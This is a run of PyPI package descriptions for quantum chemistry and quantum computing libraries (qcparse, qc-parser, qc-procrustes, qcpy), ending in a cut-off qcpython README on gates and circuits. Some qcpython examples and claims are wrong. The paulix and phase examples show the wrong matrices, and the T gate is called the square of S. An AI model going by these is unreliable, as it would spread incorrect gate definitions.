Quantum Chemistry output files into structured data objects and converting structured input objects into program-native input files. Uses data structures fromqcio.qcparseworks in harmony with a suite of other quantum chemistry tools for fast, structured, and interoperable quantum chemistry.The QC Suite of Programsqcio- Beautiful and user friendly data structures for quantum chemistry.qcparse- A library for efficient parsing of quantum chemistry data into structuredqcioobjects and conversion ofqcioinput objects to program-native input files.qcop- A package for operating quantum chemistry programs usingqciostandardized data structures. Compatible withTeraChem,psi4,QChem,NWChem,ORCA,Molpro,geomeTRICand many more.BigChem- A distributed application for running quantum chemistry calculations at scale across clusters of computers or the cloud. Bring multi-node scaling to your favorite quantum chemistry program.ChemCloud- Aweb applicationand associatedPython clientfor exposing a BigChem cluster securely over the internet.\u2728 Basic UsageInstallation:python-mpipinstallqcparseParse a file into aSinglePointResultsobject with a single line of code.fromqcparseimportparse# May pass a path or the contents of a file as string/bytesresults=parse(\"terachem\",\"/path/to/stdout.log\")Theresultsobject will be aqcio.SinglePointResultsobject. Rundir(results)inside a Python interpreter to see the various values you can access. A few prominent values are shown here as an example:fromqcparseimportparseresults=parse(\"/path/to/tc.out\",\"terachem\")results.energyresults.gradient# If a gradient calcresults.hessian# If a hessian calcresults.calcinfo_nmo# Number of molecular orbitalsParsed values can be written to disk like this:withopen(\"results.json\",\"w\")asf:f.write(result.model_dumps_json())And read from disk like this:fromqcioimportSinglePointResultsresults=SinglePointResults.open(\"results.json\")You can also runqcparsefrom the command line like this:qcparse-h# Get help message for cliqcparseterachem./path/to/tc.out>results.json# Parse TeraChem stdout to json\ud83d\udcbb ContributingPlease see thecontributing guidefor details on how to contribute new parsers to this project :)If there's data you'd like parsed from output files or want to support input files for a new program, please open an issue in this repo explaining the data items you'd like parsed and include an example output file containing the data, likethis."} +{"package": "qc-parser", "pacakge-description": "QC parser for SMaHTParses outputs of different QC tools and unifies them for the SMaHT portalInstallationSimply runpip install qc-parserto install the package. You need at least Python 3.8.To develop this package, clone this repo, make surepoetryis installed on your system and runmake install.UsageAfter installation the following command can be run from the command line:parse-qc \\\n -n 'BAM Quality Metrics' \\\n --metrics samtools /PATH/samtools.stats.txt \\\n --metrics picard_CollectInsertSizeMetrics /PATH/picard_cis_metrics.txt \\\n --additional-files /PATH/additional_output_1.pdf \\\n --additional-files /PATH/additional_output_2.tsv \\\n --output-zip metrics.zip\n --output-json qc_values.jsonIn this example, the tool will parse the Samtools output file/PATH/samtools.stats.txtand the Picard output file/PATH/picard_cis_metrics.txt. The values that are extracted from both files are specified insrc/metrics_to_extract.py. All metrics are combined and stored inqc_values.jsonthat is compatible with Tibanna_ff's generic QC functionality.Themetrics.zipwill contain the following files:samtools.stats.txt\npicard_cis_metrics.txt\nadditional_output_1.pdf\nadditional_output_2.tsvThe currently supported QC tools are:samtools_statspicard_CollectAlignmentSummaryMetricspicard_CollectInsertSizeMetricspicard_CollectWgsMetricsbamStats.pyfastqcrnaseqqc (RNA-SeQC)DevelopmentIf you want toextract a new metric from an already supported QC tool, add the metric to thesrc/metrics_to_extract.pyin the appropriate section.If you want toadd suuport for a new QC tool, you need to add a parser tosrc/MetricsParser.pyand add the metrics you want to extract from the tool tosrc/metrics_to_extract.py.TestsThe commandmake testwill run local tests."} +{"package": "qcportal", "pacakge-description": "No description available on PyPI."} +{"package": "qc-procrustes", "pacakge-description": "ProcrustesThe Procrustes library provides a set of functions for transforming a matrix to make it\nas similar as possible to a target matrix. For more information, visitProcrustes Documentation.CitationPlease use the following citation in any publication using Procrustes library:\"Procrustes: A Python Library to Find Transformationsthat Maximize the Similarity Between\nMatrices.\", F. Meng, M. Richer, A. Tehrani, J. La, T. D. Kim, P. W. Ayers, F. Heidar-Zadeh,JOURNAL XXX.DependenciesThe following dependencies are required to run Procrustes properly,Python >= 3.6:http://www.python.org/NumPy >= 1.18.5:http://www.numpy.org/SciPy >= 1.5.0:http://www.scipy.org/PyTest >= 5.3.4:https://docs.pytest.org/PyTest-Cov >= 2.8.0:https://pypi.org/project/pytest-cov/InstallationTo install Procrustes using the conda package management system, installminicondaoranacondafirst, and then:# Create and activate myenv conda environment (optional, but recommended)condacreate-nmyenvpython=3.6condaactivatemyenv# Install the stable release.condainstall-ctheochem/label/devqc-procrustesTo install Procrustes with pip, you may want to create avirtual environment, and then:# Install the stable release.pipinstallqc-procrustesSeehttps://procrustes.readthedocs.io/en/latest/usr_doc_installization.htmlfor full details."} +{"package": "qcpy", "pacakge-description": "qcPy is a Python framework for conveniently handling quantum-chemical calculations and the post-processing of the acquired data.For more general information on qcPy see itshomepage.InstallationInstall the package by running:pip install qcpyContributeSource Code:https://github.com/tillbiskup/qcpySupportIf you are having issues, please contact the package authors via GitHub and/or file a bug report there.LicenseThe project licensed under the BSD license."} +{"package": "qcpydev", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qcpython", "pacakge-description": "README.mdQCpy - A Quantum Computing Library for PythonQCpy is an open source python library and collaborative project for flexible simulations and visualizations of quantum circuits. Designed by college students with students in mind, this library contains a powerful set of tools to teach computer scientists about the emerging discipline of quantum computing.You can download the package using pip:pip install qcpythonQubitqcpy.qubit(initial_state=\u2019z\u2019)Object representation of a qubit.Parameters:initial_state (chr)default:z- Character input for starting direction in thex,y, orzaxis.Attributes:NoneExample:fromqcpyimportqubitqx=qubit(initial_state='x')qy=qubit(initial_state='y')qz=qubit(initial_state='z')print(\"qx:\\n\",qx)print(\"qy:\\n\",qy)print(\"qz:\\n\",qz)# qx:# [[0.70710677+0.j]# [0.70710677+0.j]]# qy:# [[0.70710677+0.j]# [0.+0.70710677j]]# qz:# [[1.+0.j]# [0.+0.j]]Quantum Gatesquantumgate.identity()Gate that does not modify the quantum state.Parameters:Noneidentity=[1+0j,0+0j],[0+0j,1+0j]Example:fromqcpyimportidentityprint(identity())# [[1.+0.j 0.+0.j]# [0.+0.j 1.+0.j]]quantumgate.paulix()Quantum equivalent of the NOT gate in classical computing with respect to the standard basis |0>, |1>.Parameters:NonePauliX=[0+0j,1+0j],[1+0j,0+0j]Example:fromqcpyimportpaulixprint(paulix())# [[1.+0.j 0.+0.j]# [0.+0.j 1.+0.j]]quantumgate.pauliy()Rotation around y-axis of the bloch sphere by \u03c0 radiains, mapping |0> to i|1> and |1> to -i|0>.Parameters:NonePauliY=[0+0j,0-1j],[0+1j,0+0j]Example:fromqcpyimportpauliyprint(pauliy())# [[0+0j, 0-1j]# [0+1j, 0+0j]]quantumgate.pauliz()Rotation around z-axis of the bloch sphere by \u03c0 radiains, mapping |1> to -|1>; known as the phase-flip.Parameters:NonePauliZ=[1+0j,0+0j],[0+0j,-1+0j]Example:fromqcpyimportpaulizprint(pauliz())# [[1+0j, 0+0j],# [0+0j, -1+0j]]quantumgate.hadamard()Maps the basis states |0> to |+> and |1> to |->, creating a superposition state if given a computation basis state.Parameters:NoneHadamard=[1,1][1,-1]*(1/sqrt(2))Example:fromqcpyimporthadamardprint(hadamard())# [[ 0.70710677+0.j 0.70710677+0.j]# [ 0.70710677+0.j -0.70710677+0.j]]quantumgate.cnot(little_endian=False)Controlled gate acts on two or more qubits, performing the NOT operation of the target qubit only if the control qubits are |1>, can act as a quantum regiester and is used to entangle and disentangle Bell states.Parameters:little_endian (bool)- if the gate is an inverse, with the target being above the control.# regularCNot=[1+0j,0+0j,0+0j,0+0j],[0+0j,1+0j,0+0j,0+0j],[0+0j,0+0j,0+0j,1+0j],[0+0j,0+0j,1+0j,0+0j]# little_endian = TrueCNot=[1+0j,0+0j,0+0j,0+0j],[0+0j,0+0j,0+0j,1+0j],[0+0j,0+0j,1+0j,0+0j],[0+0j,1+0j,0+0j,0+0j]Example:fromqcpyimportcnotprint(cnot())# [[1.+0.j 0.+0.j 0.+0.j 0.+0.j]# [0.+0.j 1.+0.j 0.+0.j 0.+0.j]# [0.+0.j 0.+0.j 0.+0.j 1.+0.j]# [0.+0.j 0.+0.j 1.+0.j 0.+0.j]]# [[1.+0.j 0.+0.j 0.+0.j 0.+0.j]# [0.+0.j 0.+0.j 0.+0.j 1.+0.j]# [0.+0.j 0.+0.j 1.+0.j 0.+0.j]# [0.+0.j 1.+0.j 0.+0.j 0.+0.j]]quantumgate.swap()Swaps two qubits, with respect to the basis |00>, |01>, |10>, and |11>.Parameters:NoneSwap=[1+0j,0+0j,0+0j,0+0j],[0+0j,0+0j,1+0j,0+0j],[0+0j,1+0j,0+0j,0+0j],[0+0j,0+0j,0+0j,1+0j]Example:fromqcpyimportswapprint(swap())# [1+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 1+0j, 0+0j],# [0+0j, 1+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 0+0j, 1+0j]quantumgate.toffoli()Universal reversible logic gate, known as the \u201ccontrolled-controlled-NOT\u201d gate; if the two control bits are set to 1, it will invert the target.Parameters:NoneToffoli=[1+0j,0+0j,0+0j,0+0j,0+0j,0+0j,0+0j,0+0j],[0+0j,1+0j,0+0j,0+0j,0+0j,0+0j,0+0j,0+0j],[0+0j,0+0j,1+0j,0+0j,0+0j,0+0j,0+0j,0+0j],[0+0j,0+0j,0+0j,1+0j,0+0j,0+0j,0+0j,0+0j],[0+0j,0+0j,0+0j,0+0j,1+0j,0+0j,0+0j,0+0j],[0+0j,0+0j,0+0j,0+0j,0+0j,1+0j,0+0j,0+0j],[0+0j,0+0j,0+0j,0+0j,0+0j,0+0j,0+0j,1+0j],[0+0j,0+0j,0+0j,0+0j,0+0j,0+0j,1+0j,0+0j]Example:fromqcpyimporttoffoliprint(toffoli())# [1+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 1+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 1+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 0+0j, 1+0j, 0+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 0+0j, 0+0j, 1+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 1+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 1+0j],# [0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 1+0j, 0+0j]quantumgate.phase(theta=numpy.pi/2)Applies a rotation of theta around the z-axis.Parameters:theta (float)default:numpy.pi/2- angle of rotation around z-axis.Phase=[1+0j,0+0j],[0+0j,numpy.exp(0+1j*theta)]Example:fromqcpyimportphaseprint(phase())# [1+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 1+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 1+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 0+0j, 1+0j, 0+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 0+0j, 0+0j, 1+0j, 0+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 1+0j, 0+0j, 0+0j],# [0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 1+0j],# [0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 0+0j, 1+0j, 0+0j]quantumgate.s()Equivalent to a pi/2 rotation around the z-axis.Parameters:NoneS.matrix=[1+0j,0+0j],[0+0j,0+1j]Example:fromqcpyimportsprint(s())# [1+0j, 0+0j],# [0+0j, 0+1j]quantumgate.sdg()Inverse of S gate; a -pi/2 rotation around the z-axis.Parameters:NoneSdg.matrix=[1+0j,0+0j],[0+0j,0-1j]Example:fromqcpyimportsdgprint(sdg())# [1+0j, 0+0j],# [0+0j, 0-1j]quantumgate.t()Square of S gate; where T = S^2.Parameters:NoneT.matrix=[1+0j,0+0j],[0+0j,numpy.exp((0+1j*numpy.pi)/4)]Example:fromqcpyimporttprint(t())# [[1.+0.j 0.+0.j]# [0.+0.j 0.70710677+0.70710677j]]quantumgate.tdg()Inverse of T gate.Parameters:NoneTdg=[1+0j,0+0j],[0+0j,numpy.exp((0-1j*numpy.pi)/4)]Example:fromqcpyimporttdgprint(tdg())# [[1.+0.j 0.+0.j]# [0.+0.j 0.70710677-0.70710677j]]quantumgate.rz(theta=numpy.pi/2)Rotation of qubit around the z-axis.Parameters:theta (float)default:numpy.pi/2- angle of rotation around z-axis.Rz=[numpy.exp((0-1j*(theta/2))),0+0j],[0+0j,numpy.exp(0+1j*(theta/2))]quantumgate.rx(theta=numpy.pi/2)Rotation of qubit around the x-axis.Parameters:theta (float)default:numpy.pi/2- angle of rotation around x-axis.Rx=[numpy.cos(theta/2),0-1j*numpy.sin(theta/2)],[0-1j*numpy.sin(theta/2),numpy.cos(theta/2)]Example:fromqcpyimportrxprint(rx())# [[0.70710677+0.j 0.-0.70710677j]# [0.-0.70710677j 0.70710677+0.j]]quantumgate.ry(theta=numpy.pi/2)Rotation of qubit around the y-axis.Parameters:theta (float)default:numpy.pi/2- angle of rotation around y-axis.Ry=[numpy.cos(theta/2),-1*numpy.sin(theta/2)],[numpy.sin(theta/2),numpy.cos(theta/2)]Example:fromqcpyimportryprint(ry())# [[ 0.70710677+0.j -0.70710677+0.j]# [ 0.70710677+0.j 0.70710677+0.j]]quantumgate.sx()Rotation around the x-axis by 90 degrees in the counter-clockwise direction. Also known as the \u201csquare-root X gate\u201d due to the fact that applying the SX gate twice results in an X gate.Parameters:NoneSx=[1+1j,1-1j],[1-1j,1+1j]*(1/2)Example:fromqcpyimportsxprint(sx())# [[0.5+0.5j 0.5-0.5j]# [0.5-0.5j 0.5+0.5j]]quantumgate.sxdg()Inverse of the Sx gate.Parameters:NoneSxdg=[1-1j,1+1j],[1+1j,1-1j]*(1/2)Example:fromqcpyimportsxdgprint(sxdg())# [[0.5-0.5j 0.5+0.5j]# [0.5+0.5j 0.5-0.5j]]quantumgate.u(theta=numpy.pi/2, phi=numpy.pi/2, lmbda=numpy.pi/2)Rotation of qubit with respect to theta, phi, and lambda, in Euler angles.Parameters:theta (float)default:numpy.pi/2- angle of rotation around Euler angle theta.phi (float)default:numpy.pi/2- angle of rotation around Euler angle phi.lmbda (float)default:numpy.pi/2- angle of rotation around Eulear angle lambda.U.matrix=[numpy.cos(theta/2),-1*numpy.exp(0+1j*lmbda)*numpy.sin(theta/2)],[numpy.exp(0+1j*phi)*numpy.sin(theta/2),numpy.exp(0+1j*(lmbda+phi))*numpy.cos(theta/2)]]Example:fromqcpyimportuprint(u())# [[0.7071+0.j -0.-0.7071j]# [0.+0.7071j -0.7071+0.j]]quantumgate.rxx(theta=numpy.pi/2)Rotation about XX, maximally entangling at theta = pi/2.Parameters:theta (float)default:numpy.pi/2- angle of rotation around XX.Rxx.matrix=[numpy.cos(theta/2),0+0j,0+0j,0-1j*numpy.sin(theta/2)],[0+0j,numpy.cos(theta/2),0-1j*numpy.sin(theta/2),0+0j],[0+0j,0-1j*numpy.sin(theta/2),numpy.cos(theta/2),0+0j],[0-1j*numpy.sin(theta/2),0+0j,0+0j,numpy.cos(theta/2)]Example:fromqcpyimportrxxprint(rxx())# [[0.70710677+0.j 0+0.j 0+0.j 0-0.70710677j]# [0+0.j 0.70710677+0.j 0-0.70710677j 0+0.j]# [0+0.j 0-0.70710677j 0.70710677+0.j 0+0.j]# [0-0.70710677j 0+0.j 0.+0.j 0.70710677+0.j]]quantumgate.rzz(theta=numpy.pi/2)Rotation about ZZ, maximally entangling at theta = pi/2.Parameters:theta (float)default:numpy.pi/2- angle of rotation around ZZ.Rzz.matrix=[numpy.exp(0-1j*(theta/2)),0+0j,0+0j,0+0j],[0+0j,numpy.exp(0+1j*(theta/2)),0+0j,0+0j],[0+0j,0+0j,numpy.exp(0+1j*(theta/2)),0+0j],[0+0j,0+0j,0+0j,numpy.exp(0-1j*(theta/2))]Example:fromqcpyimportrzzprint(rzz())# [[0.70710677-0.70710677j 0+0.j 0+0.jn 0+0.j]# [0+0.j 0.70710677+0.70710677j 0+0.j 0+0.j]# [0+0.j 0+0.j 0.70710677+0.70710677j 0+0.j]# [0+0.j 0+0.j 0+0.j 0.70710677-0.70710677j]]quantumgate.cr(theta=numpy.pi/2)Controlled phase shift rotation in theta radians; generalization of Cz gate.Parameters:theta (float)default:numpy.pi/2- angle of rotation in theta radians.Cr=[1+0j,0+0j,0+0j,0+0j],[0+0j,1+0j,0+0j,0+0j],[0+0j,0+0j,1+0j,0+0j],[0+0j,0+0j,0+0j,exp(theta*0+1j)]Example:fromqcpyimportcrprint(cr())# [[1+0.j 0+0.j 0+0.j 0+0.j]# [0+0.j 1+0.j 0+0.j 0+0.j]# [0+0.j 0+0.j 1+0.j 0+0.j]# [0+0.j 0+0.j 0+0.j 0.5403023+0.84147096j]]quantumgate.cz(theta=numpy.pi/2)Controlled phase shift rotation in theta radians.Parameters:theta (float)default:numpy.pi/2- angle of rotation in theta radians.Cz=[1+0j,0+0j,0+0j,0+0j],[0+0j,1+0j,0+0j,0+0j],[0+0j,0+0j,1+0j,0+0j],[0+0j,0+0j,0+0j,-1+0j]Example:fromqcpyimportczprint(cz())# [[ 1.+0.j 0.+0.j 0.+0.j 0.+0.j]# [ 0.+0.j 1.+0.j 0.+0.j 0.+0.j]# [ 0.+0.j 0.+0.j 1.+0.j 0.+0.j]# [ 0.+0.j 0.+0.j 0.+0.j -1.+0.j]]Quantum Circuitclassqcpy.quantumcircuit(qubits: int,little_endian: bool=False,prep: char='z')Quantum circuit that represents the state of a quantum system and performs operations on select qubits.Parameters:qubits (int)- number of qubits in the circuit.little_endian (bool)default:False- order of qubits and tensor products.prep (char)options: [z,y,x] - initial direction of the qubits' phase angle.Attributes:state (numpy.ndarray)- current state of quantum circuit in matrix representation.quantumcircuit.amplitude(round: int=3)Returns vector of all possible amplitudes for the quantum circuitParameters:round (int)- rounding the amplitude to the nearestroundReturns:amplitude (numpy.ndarray[float16])- amplitude of the quantum circuit.Example:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.cnot(0,1)qc.h(0)print(qc.amplitude())# [[0.5]# [0.5]# [0.5]# [0.5]]quantumcircuit.phaseangle(round: int=2,radian: bool=True)Calculates possible phase angles for the quantum circuitParameters:round (int)- round phase angle for readability.radian (bool)- whether or not the values are in radians or degrees.Returns:phase_angle (numpy.ndarray)- array of qubit's phase angle.Example:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.cnot(0,1)qc.h(0)print(qc.phaseangle())# [[0. ]# [0. ]# [0. ]# [3.14159265]]quantumcircuit.stateReturns state of the quantum circuit.Parameters:NoneReturns:state (numpy.ndarray)- array of quantum circuit's state.Example:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.cnot(0,1)print(qc.state)# [[0.707+0.j]# [0. +0.j]# [0. +0.j]# [0.707+0.j]]quantumcircuit.flatten(round: int=3)Returns state of the quantum circuit in a 1D array.Parameters:round (int)- round state for readability.Returns:state (numpy.ndarray)- array of quantum circuit's state.Example:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.cnot(0,1)print(qc.flatten())# [0.707+0.j 0. +0.j 0. +0.j 0.707+0.j]quantumcircuit.circuitqueue()Returns queue of gates on quantum circuit.Parameters:NoneReturns:queue (list)- list of gates queued on quantum circuit.Example:fromqcpyimportquantumcircuitqc=QuantumCircuit(4)qc.x(0)qc.x(1)qc.x(2)qc.rc3x(0,1,2,3)print(qc.circuitqueue())# [('X', 0), ('X', 1), ('X', 2), ('U', 3), ('U', 3), ('cnot', 2, # 3), ('U', 3), ('U', 3), ('swap', 2, 3), ('swap', 1, 2),# ('swap', 1, 2), ('swap', 2, 3), ('cnot', 0, 3), ('U', 3),# ('swap', 2, 3), ('swap', 2, 3), ('cnot', 1, 3), ('U', 3),# ('swap', 2, 3), ('swap', 1, 2), ('swap', 1, 2), ('swap', 2,# 3), ('cnot', 0, 3), ('U', 3), ('swap', 2, 3), ('swap', 2, 3),# ('cnot', 1, 3), ('U', 3), ('U', 3), ('U', 3), ('cnot', 2, 3),# ('U', 3), ('U', 3), ('rc3x', 0, 1, 2, 3)]quantumcircuit.probabilities(show_percent: bool=False,show_bit=-1,round: int=3)Returns probabilitiy of the qubits within the quantum circuit.Parameters:show_percent (bool)- convert probability to be shown in percentage.show_bit (int or str)- get the probability of a single bit with a given string of binary or a integer.round (int)- rounding the probabilities to the nearestround.Returns:prob_matrix (numpy.ndarray)- array of quantum circuit's probabilities.Example:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.cnot(0,1)print(qc.probabilities())# [0.5 0. 0. 0.5]quantumcircuit.measure()Collapses the state based on the quantum circuit's probabilities.Parameters:NoneReturns:final_state (numpy.ndarray)- array of quantum circuit's measurement.Example:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.cnot(0,1)print(qc.measure())# 00quantumcircuit.reverse()Reverses the quantum circuit's values.Parameters:NoneReturns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)print(qc.state)qc.reverse()print(qc.state)# [[0.707+0.j]# [0. +0.j]# [0.707+0.j]# [0. +0.j]]# [[0. +0.j]# [0.707+0.j]# [0. +0.j]# [0.707+0.j]]quantumcircuit.toffoli(control_1: int,control_2: int,target: int)A 3-qubit quantum gate that takes in two control qubits and one target qubit.Parameters:control_1 (int)- first control qubit.control_2 (int)- second control qubit.target (int)- target qubit.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(3)qc.h(0)qc.h(1)qc.toffoli(0,1,2)print(qc.state)# [[0.5+0.j]# [0. +0.j]# [0.5+0.j]# [0. +0.j]# [0.5+0.j]# [0. +0.j]# [0. +0.j]# [0.5+0.j]]quantumcircuit.rccx(control_1,control_2,target)A 3-qubit quantum gate that takes in two control qubits and one target qubit.Parameters:control_1 (int)- first control qubit.control_2 (int)- second control qubit.target (int)- target qubit.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(3)qc.h(0)qc.h(1)qc.rccx(0,1,2)print(qc.state)# [[ 0.5-0.j ]# [ 0. +0.j ]# [ 0.5-0.j ]# [ 0. +0.j ]# [ 0.5-0.j ]# [ 0. +0.j ]# [-0. +0.j ]# [ 0. +0.5j]]quantumcircuit.rc3x(qubit_1: int,qubit_2: int,qubit_3: int,qubit_4: int)A 4-qubit quantum gate that takes in 4 unique qubits.Parameters:qubit_1 (int)- first input qubit.qubit_2 (int)- second input qubit.qubit_3 (int)- third input qubit.qubit_4 (int)- fourth input qubit.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(4)qc.h(0)qc.h(1)qc.h(2)qc.rc3x(0,1,2,3)print(qc.state)# [[ 0.354-0.j ]# [ 0. +0.j ]# [ 0.354-0.j ]# [ 0. +0.j ]# [ 0.354-0.j ]# [ 0. +0.j ]# [ 0.354-0.j ]# [ 0. +0.j ]# [ 0.354-0.j ]# [ 0. +0.j ]# [ 0.354-0.j ]# [ 0. +0.j ]# [ 0. +0.354j]# [-0. +0.j ]# [ 0. -0.j ]# [-0.354+0.j ]]quantumcircuit.cnot(control: int,target: int)A 2-qubit quantum gate that takes in a control qubit and one target qubit.Parameters:control (int)- control qubit.target (int)- target qubit.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.cnot(0,1)print(qc.state)# [[0.707+0.j]# [0. +0.j]# [0. +0.j]# [0.707+0.j]]quantumcircuit.cr(control: int,target: int)A 2-qubit quantum gate that takes in a control qubit and one target qubit.Parameters:control (int)- control qubit.target (int)- target qubit.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.cr(0,1)print(qc.state)# [[0.707+0.j]# [0. +0.j]# [0.707+0.j]# [0. +0.j]]quantumcircuit.cz(control: int,target: int)A 2-qubit quantum gate that takes in a control qubit and one target qubit.Parameters:control (int)- control qubit.target (int)- target qubit.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.cz(0,1)print(qc.state)# [[0.707+0.j]# [0. +0.j]# [0.707+0.j]# [0. +0.j]]quantumcircuit.swap(qubit_1: int,qubit_2: int)A 2-qubit quantum gate that takes in 2 qubits to swap there properties.Parameters:qubit_1 (int)- first qubit to swap.qubit_2 (int)- second qubit to swap.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.swap(0,1)print(qc.state)# [[0.707+0.j]# [0.707+0.j]# [0. +0.j]# [0. +0.j]]quantumcircuit.rxx(qubit_1: int,qubit_2: int,theta: float=numpy.pi/2)A 2-qubit quantum gate that takes in two qubits and a representation of theta to initialize in the quantum state.Parameters:qubit_1 (int)- first qubit input.qubit_2 (int)- second qubit input.theta (float)default:numpy.pi/2- angle of rotation around z-axis.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.rxx(0,1)print(qc.state)# [[0.5+0.j ]# [0. -0.5j]# [0.5+0.j ]# [0. -0.5j]]quantumcircuit.rzz(qubit_1,qubit_2,theta=numpy.pi/2)A 2-qubit quantum gate that takes in two qubits and a representation of theta to initialize in the quantum state.Parameters:qubit_1 (int)- first qubit input.qubit_2 (int)- second qubit input.theta (float)default:numpy.pi/2- angle of rotation around z-axis.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.rxx(0,1)print(qc.state)# [[0.5+0.j ]# [0. -0.5j]# [0.5+0.j ]# [0. -0.5j]]quantumcircuit.customcontrolled(control: int,target: int,custom_matrix: np.array)Used to insert single qubit based quantum gates to have a control qubit apart of it and committing to the quantum state.Parameters:control (int)- control qubit for given matrix.target (int)- target qubit for given matrix.custom_matrix (np.array)- (2,2) matrix to be applied to the quantum circuit.Returns:NoneExample:fromqcpyimportquantumcircuit,paulixqc=quantumcircuit(2)qc.h(0)qc.customcontrolled(0,1,paulix())print(qc.state)# [[0.707+0.j]# [0. +0.j]# [0. +0.j]# [0.707+0.j]]quantumcircuit.i(qubit: int)Used to confirm value that a qubit is representing and does nothing to manipulate the value of such qubit.Parameters:qubit (int)- the qubit to have the identity gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.i(0)print(qc.state)# [[1.+0.j]# [0.+0.j]# [0.+0.j]# [0.+0.j]]quantumcircuit.x(qubit: int)Used to invert the value of what a qubit is representing.Parameters:qubit (int)- the qubit to have the Pauli-X gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.x(0)print(qc.state)# [[0.+0.j]# [0.+0.j]# [1.+0.j]# [0.+0.j]]quantumcircuit.hadmard(qubit: int)Used to put a given qubit into superposition.Parameters:qubit (int)- the qubit to have the Hadamard gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)print(qc.state)# [[0.707+0.j]# [0. +0.j]# [0.707+0.j]# [0. +0.j]]quantumcircuit.y(qubit: int)Changes the state of a qubit by pi around the y-axis of a Bloch Sphere.Parameters:qubit (int)- the qubit to have the Pauli-Y gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.y(0)print(qc.state)# [[0.+0.j]# [0.+0.j]# [0.+1.j]# [0.+0.j]]quantumcircuit.z(qubit: int)Changes the state of a qubit by pi around the z-axis of a Bloch Sphere.Parameters:qubit (int)- the qubit to have the Pauli-Z gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.z(0)print(qc.state)# [[ 0.707+0.j]# [ 0. +0.j]# [-0.707+0.j]# [ 0. +0.j]]quantumcircuit.phase(qubit: int,theta: float=numpy.pi/2)Commits to a rotation around the z-axis based off of the inputted theta value.Parameters:qubit (int)- the qubit to have the Phase gate be applied to the quantum wire.theta (float)default:numpy.pi/2- angle of rotation around z-axis.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.phase(0)print(qc.state)# [[0.707+0.j ]# [0. +0.j ]# [0. +0.707j]# [0. +0.j ]]quantumcircuit.s(qubit: int)Is a Phase gate where the inputted theta value is given as a constant of theta = pi / 2.Parameters:qubit (int)- the qubit to have the Pauli-Z gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.s(0)print(qc.state)# [[0.707+0.j ]# [0. +0.j ]# [0. +0.707j]# [0. +0.j ]]quantumcircuit.sdg(qubit: int)Is a Phase gate and inverse of the S gate where the inputted theta value is given as a constant of theta = -pi / 2.Parameters:qubit (int)- the qubit to have the Sdg gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.sdg(0)print(qc.state)# [[0.707+0.j ]# [0. +0.j ]# [0. -0.707j]# [0. +0.j ]]quantumcircuit.t(qubit: int)T gate is a special use case gate that in implemented from the P Gate.Parameters:qubit (int)- the qubit to have the T gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.t(0)print(qc.state)# [[0.707+0.j ]# [0. +0.j ]# [0.5 +0.5j]# [0. +0.j ]]quantumcircuit.tdg(qubit: int)Tdg gate is a special use case gate that in implemented from the P Gate and is the inverse of the T gate.Parameters:qubit (int)- the qubit to have the Tdg gate be applied to the quantum wire.Returns:NoneExample:fromqcpyimportquantumcircuitqc=quantumcircuit(2)qc.h(0)qc.tdg(0)print(qc.state)# [[0.707+0.j ]# [0. +0.j ]# [0.5 -0.5j]# [0. +0.j 